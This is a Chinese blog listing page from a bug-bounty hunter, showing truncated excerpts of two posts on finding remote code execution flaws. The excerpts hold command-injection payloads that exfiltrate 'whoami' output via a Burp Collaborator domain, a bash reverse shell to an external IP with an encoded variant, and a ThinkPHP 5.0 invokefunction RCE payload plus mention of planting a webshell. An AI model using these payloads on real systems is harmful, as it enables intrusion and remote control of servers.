rce漏洞
goddemon
EduSRC 2021年榜第七
土司论坛2022名人堂
src挖掘收入6位数以上
自信从容,虚心进步,慢慢成长
展开
-
黑盒挖掘rce思路
黑盒常见的几个点1.文件上传 filename处这些2.邮箱3.存在域名的地方典型使用的payloadpath拼接1.常规拼接思路| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net | 2.直接反弹shell方法,编码的反弹shell思路| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |tes.txt || echo YmFzaCAtaS原创 2021-11-11 21:17:01 · 709 阅读 · 0 评论 -
远程执行RCE漏洞,命令基础学习
thinkpad 5.0 rce漏洞payload与在get中写一句话木马的方法执行payload//①/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1//②写一句话木马//①利用post写?s=index/think\app/invokefunction&function=call_user_func原创 2020-06-08 22:25:42 · 649 阅读 · 0 评论